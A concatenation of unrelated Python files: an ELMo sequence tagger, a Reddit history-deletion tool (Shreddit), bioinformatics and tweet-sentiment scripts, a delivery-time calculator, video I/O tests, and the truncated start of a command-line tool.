weight_file = "https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5"
class SeqModel_Elmo(nn.Module):
def __init__(self, num_labels, extractor_type, hidden_dim, if_attn):
super(SeqModel_Elmo, self).__init__()
self.if_attn = if_attn
self.elmoLayer = ElmoLayer(options_file, weight_file)
self.featureEncoder = FeatureEncoder(input_dim=2048, extractor_type= extractor_type, hidden_dim =hidden_dim)
if self.if_attn:
self.attention = Attention(hidden_dim)
self.score_layer = nn.Sequential(
nn.Linear(hidden_dim, 12),
nn.LayerNorm(12),
nn.Linear(12, num_labels),
)
def forward(self, words):
emb_sequence, mask = self.elmoLayer(words)
features = self.featureEncoder(emb_sequence, mask) # emb_sequence shape: [batch_size, max_seq_len, emb_dim] => [128, 50, 100]
if self.if_attn:
features, att_weights = self.attention(features, mask.float())
else:
att_weights = None
scores = self.score_layer(features) # features shape: [batch_size, max_seq_len, hidden_dim] => [128, 50, 32]
return scores, mask, att_weights # score shape: [batch_size, max_seq_len, num_labels] => [128, 50, 3]
class ElmoLayer(nn.Module):
def __init__(self,options_file, weight_file):
super(ElmoLayer, self).__init__()
self.elmo = Elmo(options_file, weight_file, 2, dropout=0.3)
def forward(self, words):
character_ids = batch_to_ids(words)
elmo_output = self.elmo(character_ids)
elmo_representation = torch.cat(elmo_output['elmo_representations'], -1)
mask = elmo_output['mask']
return elmo_representation, mask
class FeatureEncoder(nn.Module):
def __init__(self, input_dim, extractor_type, hidden_dim):
super(FeatureEncoder, self).__init__()
self.extractor_type = extractor_type
self.hidden_dim = hidden_dim
if self.extractor_type == 'lstm':
self.lstm = nn.LSTM(input_dim, self.hidden_dim//2, num_layers=2, batch_first=True, bidirectional=True)
self.dropout = nn.Dropout(0.4)
def forward(self, sequences, mask):
"""
:param sequences: sequence shape: [batch_size, seq_len, emb_dim] => [128, 44, 100]
:param mask:
:return:
"""
if self.extractor_type == 'lstm':
lengths = torch.sum(mask, 1) # sum up all 1 values which is equal to the lenghts of sequences
lengths, order = lengths.sort(0, descending=True)
recover = order.sort(0, descending=False)[1]
sequences = sequences[order]
packed_words = pack_padded_sequence(sequences, lengths.cpu().numpy(), batch_first=True)
lstm_out, hidden = self.lstm(packed_words, None)
feats, _ = pad_packed_sequence(lstm_out)
feats = feats.permute(1, 0, 2)
feats = feats[recover] # feat shape: [batch_size, seq_len, hidden_dim] => [128, 44, 32]
return feats
class Attention(nn.Module):
"""Attention mechanism written by Gustavo Aguilar https://github.com/gaguilar"""
def __init__(self, hidden_size):
super(Attention, self).__init__()
self.da = hidden_size
self.dh = hidden_size
self.W = nn.Linear(self.dh, self.da) # (feat_dim, attn_dim)
self.v = nn.Linear(self.da, 1) # (attn_dim, 1)
def forward(self, inputs, mask):
# Raw scores
u = self.v(torch.tanh(self.W(inputs))) # (batch, seq, hidden) -> (batch, seq, attn) -> (batch, seq, 1)
# Masked softmax
u = u.exp() # exp to calculate softmax
u = mask.unsqueeze(2).float() * u # (batch, seq, 1) * (batch, seq, 1) to zerout out-of-mask numbers
sums = torch.sum(u, dim=1, keepdim=True) # now we are sure only in-mask values are in sum
a = u / sums # the probability distribution only goes to in-mask values now
# Weighted vectors
z = inputs * a
return z, a.view(inputs.size(0), inputs.size(1))
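# Illustrative instantiation (dimension values are placeholders matching the shape
# comments above; input is a batch of pre-tokenized sentences, and the ELMo weights
# are downloaded on first use):
#
# model = SeqModel_Elmo(num_labels=3, extractor_type='lstm', hidden_dim=32, if_attn=True)
# scores, mask, att_weights = model([['an', 'example', 'sentence']])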
|
import arrow
import json
import logging
import os
import praw
import time
from praw.models import Comment, Submission
from prawcore.exceptions import ResponseException, OAuthException, BadRequest, Forbidden
from essential_generators import DocumentGenerator
from re import sub
from shreddit.util import ShredditError
from itertools import chain
generator = DocumentGenerator()
class Shredder:
"""This class stores state for configuration, API objects, logging, etc.
It exposes a shred() method that application code can call to start it.
"""
def __init__(self, config, user):
logging.basicConfig()
self._logger = logging.getLogger("shreddit")
self._logger.setLevel(
level=logging.DEBUG if config.get("verbose", True) else logging.INFO
)
self.__dict__.update({f"_{k}": config[k] for k in config})
if not isinstance(self._sort, list):
self._sort = [self._sort]
self._user = user
self._connect()
if self._save_directory:
self._r.config.store_json_result = True
self._recent_cutoff = arrow.now().shift(hours=-self._hours)
self._nuke_cutoff = arrow.now().shift(hours=-self._nuke_hours)
if self._save_directory:
if not os.path.exists(self._save_directory):
os.makedirs(self._save_directory)
# Add any multireddit subreddits to the whitelist
self._whitelist = {s.lower() for s in self._whitelist}
for username, multiname in self._multi_whitelist:
multireddit = self._r.multireddit(username, multiname)
for subreddit in multireddit.subreddits:
self._whitelist.add(str(subreddit).lower())
# Add any multireddit subreddits to the blacklist
self._blacklist = set()
for username, multiname in self._multi_blacklist:
multireddit = self._r.multireddit(username, multiname)
for subreddit in multireddit.subreddits:
self._blacklist.add(str(subreddit).lower())
self._logger.info(f"Deleting ALL items before {self._nuke_cutoff}")
self._logger.info(
f"Deleting items not whitelisted until {self._recent_cutoff}"
)
self._logger.info(f"Ignoring ALL items after {self._recent_cutoff}")
self._logger.info(f"Targeting {self._item} sorted by {self._sort}")
if self._blacklist:
self._logger.info(
"Deleting ALL items from subreddits {}".format(
", ".join(list(self._blacklist))
)
)
if self._whitelist:
self._logger.info(
"Keeping items from subreddits {}".format(
", ".join(list(self._whitelist))
)
)
if self._keep_a_copy and self._save_directory:
self._logger.info(
f"Saving deleted items to: {self._save_directory}"
)
if self._trial_run:
self._logger.info("Trial run - no deletion will be performed")
def shred(self):
deleted = self._remove_things(self._build_iterator())
self._logger.info(f"Finished deleting {deleted} items. ")
if deleted >= 1000:
# This user has more than 1000 items to handle, which angers the gods of the Reddit API. So chill for a
# while and do it again.
self._logger.info(
f"Waiting {self._batch_cooldown} seconds and continuing..."
)
time.sleep(self._batch_cooldown)
self._connect()
self.shred()
def _connect(self):
try:
self._r = praw.Reddit(
self._user, check_for_updates=False, user_agent="python:shreddit:v6.0.4"
)
self._logger.info(f"Logged in as {self._r.user.me()}.")
except ResponseException:
raise ShredditError("Bad OAuth credentials")
except OAuthException:
raise ShredditError("Bad username or password")
def _check_whitelist(self, item):
"""Returns True if the item is whitelisted, False otherwise.
"""
if (
str(item.subreddit).lower() in self._whitelist
or item.id in self._whitelist_ids
):
return True
if self._whitelist_distinguished and item.distinguished:
return True
if self._whitelist_gilded and item.gilded:
return True
if self._max_score is not None and item.score > self._max_score:
return True
return False
def _save_item(self, item):
name = item.subreddit_name_prefixed[2:]
path = f"{item.author}/{name}/{item.id}.json"
if not os.path.exists(
os.path.join(self._save_directory, os.path.dirname(path))
):
os.makedirs(os.path.join(self._save_directory, os.path.dirname(path)))
with open(os.path.join(self._save_directory, path), "w") as fh:
# This is a temporary replacement for the old .json_dict property:
output = {
k: item.__dict__[k] for k in item.__dict__ if not k.startswith("_")
}
output["subreddit"] = output["subreddit"].title
output["author"] = output["author"].name
json.dump(output, fh, indent=2)
def _remove_submission(self, sub):
self._logger.info(
"Deleting submission: #{id} {url}".format(
id=sub.id, url=sub.url.encode("utf-8")
)
)
def _remove_comment(self, comment):
if self._replacement_format == "random":
replacement_text = generator.sentence()
elif self._replacement_format == "dot":
replacement_text = "."
else:
replacement_text = self._replacement_format
short_text = sub(b"\n\r\t", " ", comment.body[:35].encode("utf-8"))
msg = f"/r/{comment.subreddit}/ #{comment.id} ({short_text}) with: '{replacement_text}'"
self._logger.debug(f"Editing and deleting {msg}")
if not self._trial_run:
comment.edit(replacement_text)
def _remove(self, item):
if self._keep_a_copy and self._save_directory:
self._save_item(item)
if not self._trial_run:
if self._clear_vote:
try:
item.clear_vote()
except BadRequest:
self._logger.debug(
f"Couldn't clear vote on {item}"
)
try:
if isinstance(item, Submission):
self._remove_submission(item)
elif isinstance(item, Comment):
self._remove_comment(item)
if not self._trial_run:
item.delete()
except Forbidden:
self._logger.debug(f"Got HTTP Forbidden error trying to remove {item}, skipping.")
def _remove_things(self, items):
self._logger.info("Loading items to delete...")
to_delete = [item for item in items]
self._logger.info(
"Done. Starting on batch of {} items...".format(len(to_delete))
)
count, count_removed = 0, 0
for item in to_delete:
count += 1
self._logger.debug(f"Examining item {count}: {item}")
created = arrow.get(item.created_utc)
if str(item.subreddit).lower() in self._blacklist:
self._logger.debug("Deleting due to blacklist")
count_removed += 1
self._remove(item)
elif created <= self._nuke_cutoff:
self._logger.debug("Item occurs prior to nuke cutoff")
count_removed += 1
self._remove(item)
elif self._check_whitelist(item):
self._logger.debug("Skipping due to: whitelisted")
continue
elif created > self._recent_cutoff:
self._logger.debug("Skipping due to: too recent")
continue
else:
count_removed += 1
self._remove(item)
return count_removed
def _build_iterator(self):
user = self._r.user.me()
listings = []
iterators = []
if self._item == "comments":
listings.append(user.comments)
elif self._item == "submitted":
listings.append(user.submissions)
elif self._item == "overview":
listings.extend([user.comments, user.submissions])
for listing in listings:
for sort in self._sort:
if sort == "new":
iterators.append(listing.new(limit=None))
elif sort == "top":
iterators.append(listing.top(limit=None))
elif sort == "hot":
iterators.append(listing.hot(limit=None))
elif sort == "controversial":
iterators.append(listing.controversial(limit=None))
else:
raise ShredditError(f'Sorting "{self._sort}" not recognized.')
return chain.from_iterable(iterators)
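# Illustrative usage (assumes a praw.ini site name and a config dict providing the
# keys this class reads, e.g. "hours", "nuke_hours", "item", "sort", "whitelist", ...):
#
# shredder = Shredder(config=my_config, user="my_praw_site")
# shredder.shred()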
|
import logging, os, re, sys
from code.utils.basic_utils import check_output_and_run
import pprint as pp
def run_fanngo(config):
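    # Fill the FANNGO MATLAB run template with run-specific paths and launch it via the matlab CLI.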
workdir=config["input"]["gomap_dir"]+"/"
fanngo_sw_conf = config["data"]["mixed-method"]["fanngo"]
fanngo_conf = config["software"]["fanngo"]
fanngo_template = fanngo_conf["path"]+"/"+fanngo_conf["template"]
run_file_path = workdir + fanngo_sw_conf["out_dir"] + "/" + config["input"]["basename"] +".fanngo.m"
#print fanngo_template
conf_lines = open(fanngo_template,"r").readlines()
run_file = open(run_file_path,"w")
cwd=os.getcwd()
output = workdir + run_file_path
out_score = workdir + fanngo_sw_conf["out_dir"] + "/" + config["input"]["basename"] +".score.txt"
input_fasta = workdir+"input/"+config["input"]["fasta"]
    for line in conf_lines:
        line = line.strip()
        if line.find("$PATH") > -1:
            code_path = cwd+"/"+fanngo_conf["path"]+"/code"
            outline = line.replace("$PATH",code_path)
            print(outline, file=run_file)
        elif line.find("$INPUT_FASTA") > -1:
            outline = line.replace("$INPUT_FASTA",input_fasta)
            print(outline, file=run_file)
        elif line.find("$OUTPUT_SCORE") > -1:
            outline = line.replace("$OUTPUT_SCORE",out_score)
            print(outline, file=run_file)
        else:
            print(line, file=run_file)
run_file.close()
cmd = ["/matlab/bin/matlab", "-nojvm", "-nodisplay", "-nosplash"]
print(" ".join(cmd))
check_output_and_run(out_score,cmd,run_file_path)
|
#!/usr/bin/env python3
# command line args
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--date',required=True)
args = parser.parse_args()
# imports
import os
import zipfile
import datetime
import json
import pandas as pd
from textblob import TextBlob
# load keywords
keywords = ['world series', 'rays', 'dodgers', 'mlb']
# open the zipfile
with zipfile.ZipFile('geoTwitter' + args.date + '.zip') as archive:
# loop over every file within the zip file
for i,filename in enumerate(archive.namelist()):
print(datetime.datetime.now(),args.date,filename)
# open the inner file
with archive.open(filename) as f:
tweets = []
# loop over each line in the inner file
for line in f:
# load the tweet as a python dictionary
tweet = json.loads(line)
text = tweet['text'].lower()
                # search the tweet text for keywords
for keyword in keywords:
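                    # Note: a tweet whose text contains several keywords is appended once per matching keyword.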
if keyword in text:
if tweet \
and isinstance(tweet, dict) \
and 'place' in tweet \
and isinstance(tweet['place'], dict) \
and tweet['place']['country_code'] == 'US' \
and tweet['place']['place_type']=='city':
# print(main_dict)
tweet_dict = {
"text": tweet['text'],
"date": tweet["created_at"],
# "verified": main_dict['user']['verified'],
"city": tweet['place']['name'],
# "country": main_dict['place']['country_code'],
"state": tweet['place']["full_name"][-2:]
}
tweets.append(tweet_dict)
df =pd.DataFrame(tweets)
df['polarity'] = df.apply(lambda tweet: TextBlob(tweet['text']).sentiment.polarity, axis=1)
df.to_csv(args.date + '.csv', index=False)
|
from flask_restful import fields
from server.models.custom_fields import StudentItemField, StatusItemField, UnixTimeStamp
# Fields for classroom.py
classrooms_list_fields = { # Fields for a list of classrooms
'name': fields.String,
'id': fields.Integer
}
classroom_resource_fields = { # Fields for a single classroom
'name': fields.String,
'id': fields.Integer,
'students': fields.List(StudentItemField)
}
# Fields for report.py
reports_list_fields = { # Fields for a list of reports
'description': fields.String,
'time': UnixTimeStamp(attribute="report_time"),
'id': fields.Integer
}
report_resource_field = {
'description': fields.String,
'id': fields.Integer,
'time': UnixTimeStamp(attribute="report_time"),
'student_statuses': fields.List(StatusItemField)
} |
"""
calculates amount of time required
to deliver list of containers over graph of destination points
according to given transport, destinations and distances
"""
class Transport:
"""abstract transport class"""
def __init__(self, location, distances):
self.distances = distances
self.location = location
self.oper_time = 0
def travel(self, trav_time):
self.oper_time += trav_time
def deliver(self, destination):
self.location = destination
self.oper_time += self.distances[destination]
def way_back(self, back_from):
self.location = self.init_location
self.oper_time += self.distances[back_from]
class Truck(Transport):
"""creates truck instances with given
initial location and available delivery points"""
def __init__(self, location, dest_list):
self.init_location = 'factory'
super().__init__(location, dest_list)
class Ship(Transport):
"""creates ship instances with given
initial location and available delivery points"""
def __init__(self, location, dest_list):
self.init_location = 'port'
super().__init__(location, dest_list)
class Deliver:
"""create instance of current situation, which includes transport,
sources of containers, destinations and distances"""
def __init__(self, given_transport, deliv_string, distances):
self.transport = given_transport
self.deliv_string = deliv_string
self.distances = distances
def est_count(self, current, remain_list, transport_arr):
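        # Heuristic used by calculate_time(): returns True when enough work remains at some
        # destination to justify sending this truck back to its starting point.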
trucks = []
for i in transport_arr:
if isinstance(i, Truck):
trucks.append(i.location)
for c in set(remain_list):
if c not in self.distances:
raise LookupError('wrong destination given')
est_time = remain_list.count(c) \
* self.distances[c] \
* (len(trucks) - 1)
if est_time > self.distances[current]:
return True
return False
def calculate_time(self):
to_deliver = [c for c in self.deliv_string]
for t in self.transport:
t.oper_time = 0
if isinstance(t, Truck):
t.location = 'factory'
elif isinstance(t, Ship):
t.location = 'port'
port_stack = []
elaps_time = 0
while to_deliver:
for t in self.transport:
if isinstance(t, Truck):
if t.location == 'factory':
if t.oper_time <= elaps_time:
curr = to_deliver.pop(0)
if curr not in self.distances:
raise LookupError('wrong destination given')
if curr == 'A':
t.deliver('port')
port_stack.append((curr, t.oper_time))
else:
t.deliver(curr)
if not to_deliver:
break
if t.location != 'factory' \
and len(to_deliver) > 0 \
and self.est_count(
t.location, to_deliver, self.transport
):
t.way_back(t.location)
elaps_time += 1
while port_stack:
for s in self.transport:
if isinstance(s, Ship):
if s.location == 'port':
port_deliv = port_stack.pop(0)
if s.oper_time < port_deliv[1]:
s.oper_time = port_deliv[1]
s.deliver(port_deliv[0])
elif len(port_stack) > 0:
s.way_back(s.location)
print(
f'list "{self.deliv_string}" will be delivered in \n\
{max([t.oper_time for t in self.transport])} hours'
)
return max([t.oper_time for t in self.transport])
class Calculator:
"""allows to create transport situations and invoke calculation"""
def __init__(self, distances, num_trucks=0, num_ships=0):
if num_trucks == 0 and num_ships == 0:
raise ValueError("transport list is empty")
self.distances = distances
self.transport_creator({'trucks': num_trucks, 'ships': num_ships})
def transport_creator(self, transport):
full_transport = []
for tp in transport:
if tp == 'trucks':
for i in range(transport[tp]):
full_transport.append(
Truck('factory', {'port': 1, 'B': 5})
)
elif tp == 'ships':
for i in range(transport[tp]):
full_transport.append(
Ship('port', {'A': 4})
)
else:
raise AttributeError('wrong transport requested')
self.full_current_transport = full_transport
def process(self, delivery):
transp_graph_situation = Deliver(
self.full_current_transport, delivery, self.distances
)
return transp_graph_situation.calculate_time()
calc = Calculator({'A': 4, 'port': 1, 'B': 5}, num_trucks=2, num_ships=1)
assert calc.process('A') == 5
assert calc.process('AB') == 5
assert calc.process('BB') == 5
assert calc.process('ABB') == 7
calc.process('AABABBAB')
calc.process('ABBBABAAABBB')
|
from optparse import OptionParser
import os
import numpy as np
import pandas as pd
import get_site_features
import utils
np.set_printoptions(threshold=np.inf, linewidth=200)
pd.options.mode.chained_assignment = None
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("--transcripts", dest="TRANSCRIPTS", help="transcript sequence information")
parser.add_option("--mir", dest="MIR", help="miRNA to get features for")
parser.add_option("--mirseqs", dest="MIR_SEQS", help="tsv with miRNAs and their sequences")
parser.add_option("--kds", dest="KDS", help="kd data in tsv format, this family must be included", default=None)
parser.add_option("--sa_bg", dest="SA_BG", help="SA background for 12mers")
parser.add_option("--rnaplfold_dir", dest="RNAPLFOLD_DIR", help="folder with RNAplfold info for transcripts")
parser.add_option("--pct_file", dest="PCT_FILE", default=None, help="file with PCT information")
parser.add_option("--kd_cutoff", dest="KD_CUTOFF", type=float, default=np.inf)
parser.add_option("--outfile", dest="OUTFILE", help="location to write outputs")
parser.add_option("--overlap_dist", dest="OVERLAP_DIST", help="minimum distance between neighboring sites", type=int)
parser.add_option("--upstream_limit", dest="UPSTREAM_LIMIT", help="how far upstream to look for 3p pairing", type=int)
parser.add_option("--only_canon", dest="ONLY_CANON", help="only use canonical sites", default=False, action='store_true')
(options, args) = parser.parse_args()
TRANSCRIPTS = pd.read_csv(options.TRANSCRIPTS, sep='\t', index_col='transcript')
mirseqs = pd.read_csv(options.MIR_SEQS, sep='\t', index_col='mir')
if '_pass' in options.MIR:
MIRSEQ = mirseqs.loc[options.MIR.replace('_pass', '')]['pass_seq']
FAMILY = mirseqs.loc[options.MIR.replace('_pass', '')]['pass_family']
else:
MIRSEQ = mirseqs.loc[options.MIR]['guide_seq']
FAMILY = mirseqs.loc[options.MIR]['guide_family']
SITE8 = utils.rev_comp(MIRSEQ[1:8]) + 'A'
print(options.MIR, SITE8)
# if KD file provided, find sites based on KD file
if options.KDS is not None:
KDS = pd.read_csv(options.KDS, sep='\t')
if options.ONLY_CANON:
KDS = KDS[KDS['aligned_stype'] != 'no site']
KDS = KDS[KDS['best_stype'] == KDS['aligned_stype']]
temp = KDS[KDS['mir'] == FAMILY]
if len(temp) == 0:
raise ValueError('{} not in kd files'.format(FAMILY))
mir_kd_dict = {x: y for (x, y) in zip(temp['12mer'], temp['log_kd']) if (y < options.KD_CUTOFF)}
# find all the sites and KDs
all_features = []
for row in TRANSCRIPTS.iterrows():
all_features.append(get_site_features.get_sites_from_kd_dict_improved(row[0], row[1]['orf_utr3'], mir_kd_dict, options.OVERLAP_DIST))
# otherwise, go by sequence
else:
all_features = []
for row in TRANSCRIPTS.iterrows():
all_features.append(get_site_features.get_sites_from_sequence(row[0], row[1]['orf_utr3'], SITE8,
overlap_dist=options.OVERLAP_DIST, only_canon=options.ONLY_CANON))
all_features = pd.concat(all_features).sort_values('transcript')
all_features['mir'] = options.MIR.replace('_pass', '*')
# add site accessibility background information
temp = pd.read_csv(options.SA_BG, sep='\t', index_col='12mer').reindex(all_features['12mer'].values)
all_features['logSA_bg'] = temp['logp'].values
# add stypes
all_features['stype'] = [utils.get_centered_stype(SITE8, seq) for seq in all_features['12mer'].values]
# sanity check on background
temp = all_features[all_features['stype'] != 'no site']
if len(temp) != len(temp.dropna()):
raise ValueError('Error in site accessibility background assignment')
print('Adding 3p score and SA')
# add transcript-specific information
temp = []
for transcript, group in all_features.groupby('transcript'):
locs = group['loc'].values
# add threep pairing score
sequence = TRANSCRIPTS.loc[transcript]['orf_utr3']
group['Threep'] = [get_site_features.calculate_threep_score(MIRSEQ, sequence, int(loc - 3), options.UPSTREAM_LIMIT) for loc in locs]
# add site accessibility information
lunp_file = os.path.join(options.RNAPLFOLD_DIR, transcript) + '.txt'
rnaplfold_data = pd.read_csv(lunp_file, sep='\t', index_col='end')
group['SA'] = rnaplfold_data.reindex(locs + 7)['14'].values.astype(float) # Agarwal 2015 parameters
group['logSA'] = np.log(group['SA'])
temp.append(group)
all_features = pd.concat(temp)
all_features['orf_length'] = TRANSCRIPTS.reindex(all_features['transcript'].values)['orf_length'].values
all_features['utr3_length'] = TRANSCRIPTS.reindex(all_features['transcript'].values)['utr3_length'].values
all_features['in_ORF'] = all_features['loc'] < (all_features['orf_length'] + 15)
all_features['logSA_diff'] = all_features['logSA'] - all_features['logSA_bg']
all_features['utr3_loc'] = all_features['loc'] - all_features['orf_length']
all_features['passenger'] = ('_pass' in options.MIR) or ('*' in options.MIR)
print('Adding PCT')
# add PCT information if indicated
if options.PCT_FILE is not None:
pct_df = pd.read_csv(options.PCT_FILE, sep='\t', usecols=['Gene ID', 'miRNA family', 'Site type', 'Site start', 'PCT'])
pct_df.columns = ['transcript', 'mir', 'stype', 'loc', 'PCT']
pct_df = pct_df[pct_df['mir'] == FAMILY]
if len(pct_df) == 0:
all_features['PCT'] = 0
print(f"No PCT information for {FAMILY}")
else:
pct_df['offset'] = [1 if x in ['8mer-1a', '7mer-m8'] else 0 for x in pct_df['stype']]
pct_df['loc'] = pct_df['loc'] + pct_df['offset']
pct_df = pct_df[pct_df['stype'] != '6mer']
pct_df = pct_df.set_index(['transcript', 'loc'])
temp1 = all_features[all_features['in_ORF']]
temp1['PCT'] = 0
temp2 = all_features[~all_features['in_ORF']]
temp2['PCT'] = pct_df.reindex(temp2[['transcript', 'utr3_loc']])['PCT'].values
temp2['PCT'] = temp2['PCT'].fillna(0.0)
all_features = pd.concat([temp1, temp2])
else:
print(f"No PCT information for {FAMILY}")
all_features['PCT'] = 0
all_features = all_features.set_index('transcript').sort_index()
# write outputs
all_features.to_csv(options.OUTFILE, sep='\t')
|
import os
import numpy as np
import numpy.testing as npt
import pytest
from unittest import mock
from imp import reload
# Import the whole module so we can reload it:
from pulse2percept.io import video
from pulse2percept.io import image
from pulse2percept import stimuli
from pulse2percept import implants
@pytest.mark.skip(reason='ffmpeg dependency')
def test_video2stim():
reload(image)
reload(video)
# Smoke-test example video
from skvideo import datasets
implant = implants.ArgusI()
video.video2stim(datasets.bikes(), implant)
with pytest.raises(OSError):
video.video2stim('no-such-file.avi', implant)
@pytest.mark.skip(reason='ffmpeg dependency')
def test__set_skvideo_path():
# Smoke-test
video._set_skvideo_path('/usr/bin')
video._set_skvideo_path(libav_path='/usr/bin')
@pytest.mark.skip(reason='ffmpeg dependency')
def test_load_video_metadata():
# Load a test example
reload(video)
with pytest.raises(OSError):
metadata = video.load_video_metadata('nothing_there.mp4')
from skvideo import datasets
metadata = video.load_video_metadata(datasets.bikes())
npt.assert_equal(metadata['@codec_name'], 'h264')
npt.assert_equal(metadata['@duration_ts'], '128000')
npt.assert_equal(metadata['@r_frame_rate'], '25/1')
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}, "skvideo.utils": {}}):
with pytest.raises(ImportError):
reload(video)
video.load_video_metadata(datasets.bikes())
@pytest.mark.skip(reason='ffmpeg dependency')
def test_load_framerate():
# Load a test example
reload(video)
with pytest.raises(OSError):
video.load_video_metadata('nothing_there.mp4')
from skvideo import datasets
fps = video.load_video_framerate(datasets.bikes())
npt.assert_equal(fps, 25)
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}, "skvideo.utils": {}}):
with pytest.raises(ImportError):
reload(video)
video.load_video_framerate(datasets.bikes())
@pytest.mark.skip(reason='ffmpeg dependency')
def test_load_video():
reload(video)
# Load a test example
from skvideo import datasets
# Load with default values
movie = video.load_video(datasets.bikes(), as_timeseries=False)
npt.assert_equal(isinstance(movie, np.ndarray), True)
npt.assert_equal(movie.shape, [250, 272, 640, 3])
# Load as grayscale
movie = video.load_video(datasets.bikes(), as_timeseries=False,
as_gray=True)
npt.assert_equal(isinstance(movie, np.ndarray), True)
npt.assert_equal(movie.shape, [250, 272, 640, 1])
# Load as TimeSeries
movie = video.load_video(datasets.bikes(), as_timeseries=True)
fps = video.load_video_framerate(datasets.bikes())
npt.assert_equal(isinstance(movie, stimuli.TimeSeries), True)
npt.assert_almost_equal(movie.tsample, 1.0 / fps)
npt.assert_equal(movie.shape, [272, 640, 3, 250])
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}, "skvideo.utils": {}}):
with pytest.raises(ImportError):
reload(video)
video.load_video('invalid.avi')
@pytest.mark.skip(reason='ffmpeg dependency')
def test_load_video_generator():
# Load a test example
reload(video)
from skvideo import datasets
reader = video.load_video_generator(datasets.bikes())
for frame in reader.nextFrame():
npt.assert_equal(frame.shape, [272, 640, 3])
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}, "skvideo.utils": {}}):
with pytest.raises(ImportError):
reload(video)
video.load_video_generator('invalid.avi')
@pytest.mark.skip(reason='ffmpeg dependency')
def test_save_video():
# Load a test example
reload(video)
from skvideo import datasets
# There and back again: ndarray
videoin = video.load_video(datasets.bikes(), as_timeseries=False)
fpsin = video.load_video_framerate(datasets.bikes())
video.save_video(videoin, 'myvideo.mp4', fps=fpsin)
videout = video.load_video('myvideo.mp4', as_timeseries=False)
npt.assert_equal(videoin.shape, videout.shape)
npt.assert_almost_equal(videout / 255.0, videoin / 255.0, decimal=0)
# Write to file with different frame rate, widths, and heights
fpsout = 15
video.save_video(videoin, 'myvideo.mp4', width=100, fps=fpsout)
npt.assert_equal(video.load_video_framerate('myvideo.mp4'), fpsout)
videout = video.load_video('myvideo.mp4', as_timeseries=False)
npt.assert_equal(videout.shape[2], 100)
video.save_video(videoin, 'myvideo.mp4', height=20, fps=fpsout)
videout = video.load_video('myvideo.mp4', as_timeseries=False)
npt.assert_equal(videout.shape[1], 20)
videout = None
# There and back again: TimeSeries
tsamplein = 1.0 / float(fpsin)
tsampleout = 1.0 / float(fpsout)
rollaxes = np.roll(range(videoin.ndim), -1)
tsin = stimuli.TimeSeries(tsamplein, np.transpose(videoin, rollaxes))
video.save_video(tsin, 'myvideo.mp4', fps=fpsout)
npt.assert_equal(tsin.tsample, tsamplein)
tsout = video.load_video('myvideo.mp4', as_timeseries=True)
npt.assert_equal(video.load_video_framerate('myvideo.mp4'), fpsout)
npt.assert_equal(isinstance(tsout, stimuli.TimeSeries), True)
npt.assert_almost_equal(tsout.tsample, tsampleout)
# Also verify the actual data
tsres = tsin.resample(tsampleout)
npt.assert_equal(tsout.shape, tsres.shape)
npt.assert_almost_equal(tsout.data / 255.0, tsres.data / tsres.data.max(),
decimal=0)
os.remove('myvideo.mp4')
with pytest.raises(TypeError):
video.save_video([2, 3, 4], 'invalid.avi')
# Trigger an import error
with mock.patch.dict("sys.modules", {"skvideo": {}}):
with pytest.raises(ImportError):
reload(video)
video.save_video(videoin, 'invalid.avi')
with mock.patch.dict("sys.modules", {"skimage": {}}):
with pytest.raises(ImportError):
reload(video)
video.save_video(videoin, 'invalid.avi')
@pytest.mark.skip(reason='ffmpeg dependency')
def test_save_video_sidebyside():
reload(video)
from skvideo import datasets
videoin = video.load_video(datasets.bikes(), as_timeseries=False)
fps = video.load_video_framerate(datasets.bikes())
tsample = 1.0 / float(fps)
rollaxes = np.roll(range(videoin.ndim), -1)
percept = stimuli.TimeSeries(tsample, np.transpose(videoin, rollaxes))
video.save_video_sidebyside(datasets.bikes(), percept, 'mymovie.mp4',
fps=fps)
videout = video.load_video('mymovie.mp4', as_timeseries=False)
npt.assert_equal(videout.shape[0], videoin.shape[0])
npt.assert_equal(videout.shape[1], videoin.shape[1])
npt.assert_equal(videout.shape[2], videoin.shape[2] * 2)
npt.assert_equal(videout.shape[3], videoin.shape[3])
os.remove('mymovie.mp4')
with pytest.raises(TypeError):
video.save_video_sidebyside(datasets.bikes(), [2, 3, 4], 'invalid.avi')
with mock.patch.dict("sys.modules", {"skvideo": {}}):
with pytest.raises(ImportError):
reload(video)
video.save_video_sidebyside(datasets.bikes(), percept,
'invalid.avi')
with mock.patch.dict("sys.modules", {"skimage": {}}):
with pytest.raises(ImportError):
reload(video)
video.save_video_sidebyside(datasets.bikes(), percept,
'invalid.avi')
|
from typing import List, Any
from dataclasses import dataclass
import pyjq
GPU_MODELS = ['Quadro RTX 6000/8000', 'Tesla T4']
@dataclass(frozen=True)
class GPU:
"""
Note that because GPUs aren't properly part of Ralph catalog structure,
they appear as special fields inside the node and as such are not
subclassed from RalphAsset (they don't have a URL).
"""
Model: str
Description: str
BDF: str
@staticmethod
def find_gpus(node_raw_json) -> List[Any]:
"""
Find if there are GPUs in this node. Returns a list
of GPU objects (which can be empty).
"""
custom_fields = pyjq.one('.custom_fields', node_raw_json)
ret = list()
for field in custom_fields:
for gpu_model in GPU_MODELS:
if gpu_model in custom_fields[field]:
model = gpu_model
description = custom_fields[field]
bdf = custom_fields[field + '_pci_id']
ret.append(GPU(model, description, bdf))
        return ret
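# A minimal usage sketch, assuming a hypothetical Ralph node JSON in which GPU
# info lives in custom fields; the field names and PCI id below are made up.
if __name__ == '__main__':
    node = {
        'custom_fields': {
            'gpu_1': 'Tesla T4 16GB',
            'gpu_1_pci_id': '0000:3b:00.0',
        }
    }
    # -> [GPU(Model='Tesla T4', Description='Tesla T4 16GB', BDF='0000:3b:00.0')]
    print(GPU.find_gpus(node))
|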
import argparse
import configparser
import os
import subprocess
import sys
import yaml
from openlabcmd import exceptions
from openlabcmd.plugins import base
from openlabcmd import utils
from openlabcmd.utils import _color
from openlabcmd import zk
from openlabcmd import repo
from openlabcmd import hint
class OpenLabCmd(object):
def __init__(self):
self.parser = None
self.args = None
self.config = None
self.zk = None
@staticmethod
def _str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
